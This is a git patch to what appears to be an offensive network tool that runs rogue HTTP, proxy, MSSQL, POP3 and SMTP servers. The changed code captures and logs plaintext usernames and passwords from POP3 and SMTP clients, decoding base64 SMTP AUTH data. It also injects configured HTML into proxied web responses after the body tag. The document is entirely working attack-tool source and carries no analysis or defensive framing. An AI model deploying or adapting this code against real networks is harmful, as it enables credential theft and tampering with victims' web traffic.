From 867bcdde03b92c67c74643f25a06049c5ced8a3c Mon Sep 17 00:00:00 2001 From: jrmdev Date: Thu, 2 Jul 2015 16:52:06 +1000 Subject: [PATCH] Further improvements and fixes. --- servers/HTTP.py | 4 ++-- servers/HTTP_Proxy.py | 27 +++++++++++++-------------- servers/IMAP.py | 1 + servers/MSSQL.py | 5 +++-- servers/POP3.py | 7 ++++--- servers/SMTP.py | 31 ++++++++++++++++++++----------- utils.py | 1 + 7 files changed, 44 insertions(+), 32 deletions(-) diff --git a/servers/HTTP.py b/servers/HTTP.py index 172a2e8..9929458 100644 --- a/servers/HTTP.py +++ b/servers/HTTP.py @@ -171,7 +171,7 @@ def PacketSequence(data, client): return WPAD_Custom else: - Buffer = IIS_Auth_Granted(Payload=settings.Config.HTMLToInject) + Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) Buffer.calculate() return str(Buffer) @@ -192,7 +192,7 @@ def PacketSequence(data, client): return WPAD_Custom else: - Buffer = IIS_Auth_Granted(Payload=settings.Config.HTMLToInject) + Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) Buffer.calculate() return str(Buffer) diff --git a/servers/HTTP_Proxy.py b/servers/HTTP_Proxy.py index 56b6488..fd7e949 100644 --- a/servers/HTTP_Proxy.py +++ b/servers/HTTP_Proxy.py @@ -58,9 +58,9 @@ def InjectData(data, client, req_uri): HasBody = re.findall('(]*>)', Content) if HasBody: - print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HTMLToInject, 3, 1)) + print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1)) - Content = Content.replace(HasBody[0], '%s\n%s' % (HasBody[0], settings.Config.HTMLToInject)) + Content = Content.replace(HasBody[0], '%s\n%s' % (HasBody[0], settings.Config.HtmlToInject)) Headers = Headers.replace("Content-Length: "+Len, "Content-Length: "+ str(len(Content))) if "content-encoding: gzip" in Headers.lower(): @@ -74,7 +74,6 @@ def InjectData(data, client, req_uri): return data class ProxySock: - def __init__(self, socket, proxy_host, proxy_port) : # First, use the socket, without any change @@ -222,7 +221,7 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler): return 0 return 1 - def socket_proxy(self): + def socket_proxy(self, af, fam): Proxy = settings.Config.Upstream_Proxy Proxy = Proxy.rstrip('/').replace('http://', '').replace('https://', '') Proxy = Proxy.split(':') @@ -230,13 +229,13 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler): try: Proxy = (Proxy[0], int(Proxy[1])) except: Proxy = (Proxy[0], 8080) - soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + soc = socket.socket(af, fam) return ProxySock(soc, Proxy[0], Proxy[1]) def do_CONNECT(self): if settings.Config.Upstream_Proxy: - soc = self.socket_proxy() + soc = self.socket_proxy(socket.AF_INET, socket.SOCK_STREAM) else: soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) @@ -261,7 +260,7 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler): return if settings.Config.Upstream_Proxy: - soc = self.socket_proxy() + soc = self.socket_proxy(socket.AF_INET, socket.SOCK_STREAM) else: soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) @@ -306,12 +305,12 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler): for i in ins: if i is soc: out = self.connection - #try: - data = i.recv(4096) - if len(data) > 1: - data = InjectData(data, self.client_address[0], self.path) - #except: - # pass + try: + data = i.recv(4096) + if len(data) > 1: + data = InjectData(data, self.client_address[0], self.path) + except: + pass else: out = soc data = i.recv(4096) @@ -332,4 +331,4 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler): do_HEAD = do_GET do_POST = do_GET do_PUT = do_GET - do_DELETE=do_GET \ No newline at end of file + do_DELETE=do_GET diff --git a/servers/IMAP.py b/servers/IMAP.py index bf67579..8463e86 100644 --- a/servers/IMAP.py +++ b/servers/IMAP.py @@ -17,6 +17,7 @@ import os import settings +from utils import * from SocketServer import BaseRequestHandler from packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd diff --git a/servers/MSSQL.py b/servers/MSSQL.py index 0aca262..66e4bbd 100644 --- a/servers/MSSQL.py +++ b/servers/MSSQL.py @@ -112,17 +112,18 @@ def ParseClearTextSQLPass(data, client): class MSSQL(BaseRequestHandler): def handle(self): + print text("[MSSQL] Received connection from %s" % self.client_address[0]) try: while True: data = self.request.recv(1024) self.request.settimeout(0.1) - + # Pre-Login Message if data[0] == "\x12": Buffer = str(MSSQLPreLoginAnswer()) self.request.send(Buffer) data = self.request.recv(1024) - + # NegoSSP if data[0] == "\x10": if re.search("NTLMSSP",data): diff --git a/servers/POP3.py b/servers/POP3.py index 7944b94..f96be7c 100644 --- a/servers/POP3.py +++ b/servers/POP3.py @@ -17,6 +17,7 @@ import os import settings +from utils import * from SocketServer import BaseRequestHandler from packets import POPOKPacket @@ -41,9 +42,9 @@ class POP3(BaseRequestHandler): if data[0:4] == "PASS": Pass = data[5:].replace("\r\n","") - print text("[POP3] Address : %s" % self.client_address[0]) - print text("[POP3] Username : %s" % User) - print text("[POP3] Password : %s" % Pass) + print text("[POP3] Address : %s" % color(self.client_address[0], 3)) + print text("[POP3] Username : %s" % color(User, 3)) + print text("[POP3] Password : %s" % color(Pass, 3)) WriteData(settings.Config.POP3Log % self.client_address[0], User+":"+Pass, User+":"+Pass) data = self.SendPacketAndRead() diff --git a/servers/SMTP.py b/servers/SMTP.py index bfa0ca7..186dae9 100644 --- a/servers/SMTP.py +++ b/servers/SMTP.py @@ -17,6 +17,8 @@ import os import settings +from utils import * +from base64 import b64decode, b64encode from SocketServer import BaseRequestHandler from packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2 @@ -35,21 +37,28 @@ class ESMTP(BaseRequestHandler): if data[0:4] == "AUTH": self.request.send(str(SMTPAUTH1())) data = self.request.recv(1024) - + if data: - Username = b64decode(data[:len(data)-2]) - self.request.send(str(SMTPAUTH2())) - data = self.request.recv(1024) + try: + User = filter(None, b64decode(data).split('\x00')) + Username = User[0] + Password = User[1] + except: + Username = b64decode(data) - if data: - Password = b64decode(data[:len(data)-2]) + self.request.send(str(SMTPAUTH2())) + data = self.request.recv(1024) - print text("[SMTP] Address : %s" % color(self.client_address[0], 3, 0)) - print text("[SMTP] Username : %s" % color(Username, 3, 0)) - print text("[SMTP] Password : %s" % color(Password, 3, 0)) - WriteData(settings.Config.SMTPClearLog % self.client_address[0], Username+":"+Password, Username+":"+Password) + if data: + try: Password = b64decode(data) + except: Password = data - ## FIXME: Close connection properly + print text("[SMTP] Address : %s" % color(self.client_address[0], 3)) + print text("[SMTP] Username : %s" % color(Username, 3)) + print text("[SMTP] Password : %s" % color(Password, 3)) + WriteData(settings.Config.SMTPClearLog % self.client_address[0], Username+":"+Password, Username+":"+Password) + + ## FIXME: Close connection properly except Exception: pass \ No newline at end of file diff --git a/utils.py b/utils.py index a28e751..2c86743 100644 --- a/utils.py +++ b/utils.py @@ -211,6 +211,7 @@ def StartupMessage(): print "" print "" +# Useful for debugging def hexdump(src, l=0x16): res = [] sep = '.'